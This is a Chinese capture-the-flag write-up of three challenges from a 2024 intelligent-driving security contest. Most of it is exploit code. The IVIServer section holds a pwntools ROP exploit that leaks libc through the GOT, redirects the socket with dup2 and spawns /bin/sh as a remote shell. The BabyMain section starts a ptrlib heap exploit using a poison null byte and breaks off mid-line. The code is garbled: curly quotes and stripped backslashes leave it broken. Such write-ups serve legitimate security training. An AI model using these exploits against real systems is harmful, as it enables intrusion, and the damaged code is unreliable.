01 VehicleAPP
![【WriteUP·中篇】2024WIDC世界智能驾驶挑战赛“天融信杯”信息安全攻防赛 【WriteUP·中篇】2024WIDC世界智能驾驶挑战赛“天融信杯”信息安全攻防赛](https://ctfiot.oss-cn-beijing.aliyuncs.com/uploads/2024/06/0-1717846649.png)
(2)获取IPA
(3)逆向
(4)存在pin码认证
(5)交叉应用找验证函数
(6)获取全局变量
(7)调用获取flag
(8)逐段分析,验证长度
02 IVIServer
IVI开启了一个httpserver
from pwn import *
context.log_level=’debug’
context.binary=ELF(‘./server’)
elf=ELF(‘./server’)
libc=ELF(‘./libc-2.31.so’)
SOCKFD = 4
def get(payload):
global p
p = remote(‘127.0.0.1’, 9080)
py=flat({
0:b’GET /’,
255: b’r’,
0x138:[
payload
],
},filler=b’x00′)
p.send(py+b’rn’)
rop=ROP(elf)
rop.http_response(4,elf.got[‘write’])
get(rop.chain())
p.recvuntil(b'</html>nHTTP/1.1′)
libcbase=u64(p.recvline().strip().ljust(8,b’x00′))- libc.symbols[‘write’]
success(hex(libcbase))
libc.address=libcbase
rop = ROP(libc)
rop.dup2(SOCKFD, 0)
rop.dup2(SOCKFD, 1)
rop.dup2(SOCKFD, 2)
rop.system(next(libc.search(b’/bin/sh’)))
get(rop.chain())
p.recvuntil(b'</html>n’)
p.interactive()
03 BabyMain
一个石子引发的事故
from ptrlib import *
from tqdm import tqdm
libc = ELF(“./libc-2.31.so”)
sock = Socket(“172.10.0.20”, 9003)
# 1. Leak heap address
# Prepare libc address on heap
for i in range(4):
sock.sendlineafter(“> “, “1”)
sock.sendlineafter(“index: “, str(i))
# Overwrite saved rbp of main function frame
sock.sendlineafter(“> “, “1”)
sock.sendlineafter(“index: “, “6”)
# Poison null byte to argv[0] and return address of main
sock.sendlineafter(“> “, “2”)
sock.sendlineafter(“index: “, b”9″ + b”